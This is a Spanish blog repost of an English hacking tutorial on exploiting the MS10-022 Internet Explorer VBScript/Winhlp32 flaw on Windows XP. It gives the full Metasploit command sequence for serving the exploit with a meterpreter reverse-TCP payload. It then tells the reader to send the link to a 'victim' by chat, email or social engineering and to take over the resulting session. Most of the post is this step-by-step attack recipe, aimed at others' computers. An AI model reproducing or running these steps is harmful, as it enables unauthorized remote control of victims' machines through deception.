lunes, 26 de enero de 2015

Hack Remote Windows XP PC using Internet Explorer Winhlp32.exe MsgBox Code Execution

This module exploits a code execution vulnerability that occurs when a user presses F1 on Message Box originated from VBscript within a web page. When the user hits F1, the Message Box help functionality will attempt to load and use a HLP file from an SMB or WebDAV (if the WebDAV redirector is enabled) server. This particular version of the exploit implements a WebDAV server that will serve HLP file as well as a payload EXE. During testing warnings about the payload EXE being unsigned were witnessed. A future version of this module might use other methods that do not create such a warning.
Exploit Targets
Windows XP service pack 2
Windows XP service pack 3
Internet Explorer 5, 6, 7
Requirement
Attacker: Backtrack 5
Victim PC: Windows XP
Open backtrack terminal type msfconsole
Now type use exploit/windows/browser/ms10_022_ie_vbscript_winhlp32
Msf exploit (ms10_022_ie_vbscript_winhlp32)>set payload windows/meterpreter/reverse_tcp
Msf exploit (ms10_022_ie_vbscript_winhlp32)>set lhost 192.168.1.2 (IP of Local Host)
Msf exploit (ms10_022_ie_vbscript_winhlp32)>set srvhost 192.168.1.2 (This must be an address on the local machine)
Msf exploit (ms10_022_ie_vbscript_winhlp32)>set uripath / (The Url to use for this exploit)
Msf exploit (ms10_022_ie_vbscript_winhlp32)>exploit
Now an URL you should give to your victim http://192.168.1.2

Send the link of the server to the victim via chat or email or any social engineering technique.
Now you have access to the victims PC. Use “Sessions -l” and the Session number to connect to the session. And Now Type “sessions -i ID“ 

Fuente: http://www.hackingarticles.in/hack-remote-xp-pc-using-internet-explorer-winhlp32-exe-msgbox-code-execution/

No hay comentarios:

Publicar un comentario